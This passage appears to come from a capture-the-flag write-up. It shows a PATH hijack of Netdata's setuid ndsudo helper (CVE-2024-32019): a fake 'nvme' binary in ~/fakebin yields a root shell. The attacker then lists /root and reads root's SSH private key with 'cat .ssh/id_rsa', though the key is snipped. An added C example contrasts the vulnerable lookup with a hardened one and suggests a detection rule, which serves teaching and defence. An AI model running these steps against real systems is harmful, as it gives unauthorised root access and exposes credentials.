oliver@editor:/tmp$ chmod +x nvme
oliver@editor:/tmp$ ls -al
total 56
drwxrwxrwt 10 root root 4096 Nov 8 13:35 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
srwxrwx--- 1 netdata netdata 0 Nov 7 20:14 netdata-ipc
-rwxrwxr-x 1 oliver oliver 16056 Nov 8 13:35 nvme
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-ModemManager.service-Nop8ux
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-logind.service-NdU3Ll
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-resolved.service-jMpAX6
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-timesyncd.service-hW0hLh
drwx------ 3 root root 4096 Nov 7 21:00 systemd-private-12cd875b3b4847b49340fcfcd5342a70-upower.service-1t4RDG
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-xwiki.service-uT51Ke
drwx------ 2 oliver oliver 4096 Nov 8 12:30 tmux-1000
drwx------ 2 root root 4096 Nov 7 20:14 vmware-root_612-2731021090
oliver@editor:/tmp$ mkdir -p ~/fakebin
oliver@editor:/tmp$ ls
netdata-ipc systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-resolved.service-jMpAX6 tmux-1000
nvme systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-timesyncd.service-hW0hLh vmware-root_612-2731021090
systemd-private-12cd875b3b4847b49340fcfcd5342a70-ModemManager.service-Nop8ux systemd-private-12cd875b3b4847b49340fcfcd5342a70-upower.service-1t4RDG
systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-logind.service-NdU3Ll systemd-private-12cd875b3b4847b49340fcfcd5342a70-xwiki.service-uT51Ke
oliver@editor:/tmp$ cp nvme ~/fakebin
oliver@editor:/tmp$ export PATH=~/fakebin:$PATH
oliver@editor:/tmp$ echo $PATH
/home/oliver/fakebin:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
oliver@editor:/tmp$ which nvme
/home/oliver/fakebin/nvme
oliver@editor:/tmp$
</details>
There we go; earlier I just hadn't confirmed it yet. Now, if we hijack the PATH, we should be able to get root access:
oliver@editor:/tmp$ which nvme
/home/oliver/fakebin/nvme
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme
command not recognized: nvme
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)
Yes, we’re root now.
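To make the root cause clear, here is an added example (my own code, not from the writeup and not Netdata's source): a minimal C model of the lookup ndsudo performed, resolving the helper name by walking the caller's PATH, beside a hardened lookup that ignores the environment and only accepts root-owned, non-writable binaries from fixed system directories. The constructed demo_hijack() scenario reproduces the ~/fakebin trick above in a temporary directory; the function names, the trusted directory list and the /tmp location are assumptions of this example.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Write "dir/name" into out and report whether it is an executable regular file. */
static int probe(const char *dir, const char *name, char *out, size_t outlen) {
    struct stat st;
    if (snprintf(out, outlen, "%s/%s", dir, name) >= (int)outlen)
        return 0;
    return stat(out, &st) == 0 && S_ISREG(st.st_mode) && access(out, X_OK) == 0;
}

/* Vulnerable pattern (the core of CVE-2024-32019): a setuid helper resolves
 * the tool it is about to run by walking a PATH string that the unprivileged
 * caller controls, so whatever directory the caller prepends wins. */
int find_in_path(const char *name, const char *path_env, char *out, size_t outlen) {
    int found = 0;
    char *copy;
    if (!path_env || !(copy = strdup(path_env)))
        return 0;
    for (char *dir = strtok(copy, ":"); dir && !found; dir = strtok(NULL, ":"))
        found = probe(dir, name, out, outlen);
    free(copy);
    return found;
}

/* Hardened pattern: ignore the environment, look only in fixed system
 * directories, and refuse anything not owned by root or writable by others.
 * The directory list is an assumption chosen for this example. */
static const char *const trusted_dirs[] = { "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL };

int find_in_trusted_dirs(const char *name, char *out, size_t outlen) {
    struct stat st;
    for (int i = 0; trusted_dirs[i]; i++) {
        if (!probe(trusted_dirs[i], name, out, outlen) || stat(out, &st) != 0)
            continue;
        if (st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH)))
            continue;
        return 1;
    }
    return 0;
}

/* Constructed scenario mirroring the ~/fakebin step: a fake "nvme" is dropped
 * in a temporary directory that is then prepended to PATH. Returns 1 when the
 * PATH walk resolves to the fake while the trusted lookup never does. */
int demo_hijack(void) {
    char dir[] = "/tmp/fakebin-XXXXXX", fake[512], path_env[1024], resolved[512];
    FILE *f;
    int via_path, via_trusted, hijacked, safe;
    if (!mkdtemp(dir))
        return 0;
    snprintf(fake, sizeof fake, "%s/nvme", dir);
    if (!(f = fopen(fake, "w")))
        return 0;
    fputs("#!/bin/sh\nid\n", f);          /* harmless stand-in for the planted binary */
    fclose(f);
    chmod(fake, 0755);
    snprintf(path_env, sizeof path_env, "%s:/usr/bin:/bin", dir);

    via_path = find_in_path("nvme", path_env, resolved, sizeof resolved);
    hijacked = via_path && strcmp(resolved, fake) == 0;
    via_trusted = find_in_trusted_dirs("nvme", resolved, sizeof resolved);
    safe = !via_trusted || strncmp(resolved, dir, strlen(dir)) != 0;

    unlink(fake);
    rmdir(dir);
    return hijacked && safe;
}

int main(void) {
    char buf[512];
    printf("PATH lookup hijacked, trusted lookup safe: %s\n", demo_hijack() ? "yes" : "no");
    if (find_in_path("sh", getenv("PATH"), buf, sizeof buf))
        printf("sh via PATH: %s\n", buf);
    return 0;
}
```

The same check is what a detection rule can key on: a setuid Netdata plugin spawning a child whose executable path lies outside the system directories.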
<details>
<summary>Click to view bash output</summary>
root@editor:/root# ls -al
total 44
drwx------ 8 root root 4096 Nov 7 20:14 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
lrwxrwxrwx 1 root root 9 Jul 1 19:19 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 2 root root 4096 Apr 27 2023 .cache
drwxr-xr-x 2 root root 4096 Jun 19 08:14 .config
drwxr-xr-x 3 root root 4096 Apr 27 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 2 root root 4096 Jun 19 11:30 .ssh
-rw-r----- 1 root root 33 Nov 7 20:14 root.txt
drwxr-xr-x 2 root root 4096 Jun 19 08:14 scripts
drwx------ 3 root root 4096 Apr 27 2023 snap
root@editor:/root# ls -al .ssh
total 20
drwx------ 2 root root 4096 Jun 19 11:30 .
drwx------ 8 root root 4096 Nov 7 20:14 ..
-rw------- 1 root root 565 Jun 19 11:34 authorized_keys
-rw------- 1 root root 2590 Jun 19 11:30 id_rsa
-rw-r--r-- 1 root root 565 Jun 19 11:30 id_rsa.pub
root@editor:/root# cat .ssh/id_rsa
. . .[SNIP]. . .
</details>
Here's the RSA key.

Hope you all like it and happy hacking!